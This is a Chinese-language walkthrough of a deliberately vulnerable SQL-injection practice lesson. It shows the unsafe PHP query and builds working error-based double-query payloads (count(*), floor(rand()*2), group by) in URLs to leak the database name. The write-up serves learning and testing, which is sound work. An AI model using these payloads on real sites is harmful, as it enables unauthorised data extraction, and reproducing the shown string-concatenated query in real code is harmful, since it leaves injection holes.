Lesson-5 GET - Doube Injection - Single Quotes - String
首先进入欢迎界面
构造?id=1,结果如图所示
构造?id=2, id=3,(id由1到14),结果均如上图所示。
构造?id=1' ,结果如图所示。
很显然是因为$id右边本来有一个单引号,结果因为添加的单引号后,多出来一个单引号。
和以前将,构造 ?id=1' --+,将右边注释掉,结果如图所示。
还是没有任何信息显示。
构造?id=0,结果如图所示。
首先我知道数据库中是没有id=0的数据的,结果在界面上就没有任何信息显示。
我猜测是执行SQL语句后,如果SQL语句查询到匹配的数据就显示‘You are in.......’。
如果SQL语句没有查询到匹配的数据,就不显示任何信息。
查看后台php源代码。
<pre name="code" class="php">$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
发现和我的猜测一致,当查询到信息后echo "You are in .......“。
如果没有查到任何信息的话,就不显示任何信息。
当然如果查询有错误的话,会有错误回显。
那么怎么完成SQL注入呢?
只有利用错误回显了。
有些测试工程师发现,将group by与一个聚合函数一起使用,如count(*),可以将想要查询的内容作为错误信息返回。
首先看看MySQL下information_schema的利用(我转载的另一篇博客中有相关内容)。
select * from information_schema.tables;
此SQL语句返回当前用户可以查到的所有表的所有信息。
如果当前用户是root,那么就可以看到所有的表的所有信息。
select count(*) from information_schema.tables;
此SQL语句返回可以查到的表的数量。如图所示。
下面看如下SQL语句
select concat(database(), '#' , floor (rand()*2))as a from information_schema.tables;
执行后结果如下图。
显然一共有159个表所以共有159行security#0,或security#1。
如下SQL查询语句,
select count(*),concat(database(), '#' , floor (rand()*2))as a from information_schema.tables group by a;
将
group by,count(*)加入到上述SQL语句中,执行结果如图所示。
连续执行,观察结果。
发现出现了错误,而错误中刚好有当前数据库的名称 security。
接着在MySQL的命令行测试,如何构造URL完成SQL注入。
在Lesson-5的URL构造如下:
?id=1' and (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) limit 0,1) --+
显示如下信息。
构造?id=1' and (select 1 from (select count(*),concat(database(), '~' , floor (rand()*2))as a from information_schema.tables group by a) as b limit 0,1) --+
结果如图所示:
刷新几次:
的到当前数据库为security。
同理可得到数据库版本,所在位置等信息。